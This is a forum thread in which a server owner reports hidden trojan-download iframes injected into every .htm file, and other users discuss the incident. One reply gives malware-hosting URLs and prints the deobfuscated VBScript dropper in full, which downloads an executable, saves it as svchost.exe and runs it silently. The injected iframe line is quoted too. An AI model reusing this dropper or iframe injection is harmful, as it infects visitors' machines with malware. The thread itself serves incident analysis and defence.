Server infected by a trojan

S

s

Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>


So, any time someone tried to view a site on my server they were also
directed to a Trojan download.

I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.

Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.

Any advice/help is much appreciated.
 
G

Gabriele Neukam

Today at around 9:42am my local time one of my web servers got infected
somehow. What ever infected it then scanned through all .htm files on the
server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>
Click to expand...

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

(e-mail address removed)

--
Is there such a thing as a Honeymoon period in a new newsgroup?
Click to expand...
(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no :)
(Krustov in ucv)
 
J

jen

s said:
It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scan's all the .htm files and injects the iframe line.
Click to expand...

Maybe reading this will enlighten you some(Google is your friend):

Virus Attack on web server
Iframe code getting added to each page request:
http://www.webmasterworld.com/microsoft_asp_net/3279736.htm

large-scale web attacks targeting sites and their users:
http://arstechnica.com/news.ars/pos...over-massive-attack-on-italian-web-sites.html

-jen
 
V

Virus Guy

s said:
(...) hker.htm
Click to expand...

While searching the web for instances of kher.htm, I came across
these:

(warning - do not follow these links unless you know what you're
doing)

www.goldwindos2000.com/hkeraone/test.htm
us6.redhat520.com/haoba.htm

They are really executable files (not htm).

As of around 2 pm (EST), test.htm is identified mostly as a
downloader.trojan (4608.KF / 4608.102). Detection rate is 47% (not
detected by Kaspersky, Symantec among others).

haoba.htm is identified as Explorer.Hijack.AJYS / .4080. Detection
rate is 37%. Not detected by Avast, F-prot, Kaspersky, McAfee,
Microsoft, Symantec, among others.

---------------------------------

hker.htm is being coded with random spaces to give different MD5
hashes.

I submitted a sample to VT, and only 2 AV's id'd it as a threat:

Authentium: VBS/Psyme.BT@dl
NOD32v2: JS/Exploit.ADODB.Stream.Y

See this:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=VBS_PSYME.FP

When you take out the spaces, here's what it is (can someone decode
this script and print the URL?)

(I removed a few < and > because my nntp server doesn't like HTML code
I guess)

html
scriptlanguage="VBScript"
onerrorresumenext
dl="http://www.goldwindos2000.com/hkeraone/test.htm"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Setx=df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
setS=df.createobject(stra,"")
S.type=1
c4="G"
c5="E"
c6="T"
strc=c4&c5&c6
x.Openstrc,dl,False
x.Send
fname1="svchost.exe"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
/script
head
title Hello!!! /title
/head body
/body /html
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

IRC BOT/ TORPIG detected by ISP but not found by multiple A-V scanners 3
PC Infected Full of TROJANS......Can’t Delete & Keep Coming Back!! 1
Possible virus discovery (in IE cache -> .hlp files) 8
Does this warning mean I am still infected (F secure) 1
MS04-013/KB837009/Trojan 1
Virus question for the experts... or who-ever 10
Recovering from a Trojan 5
I think I've got a virus/trojan please hellp 6

Top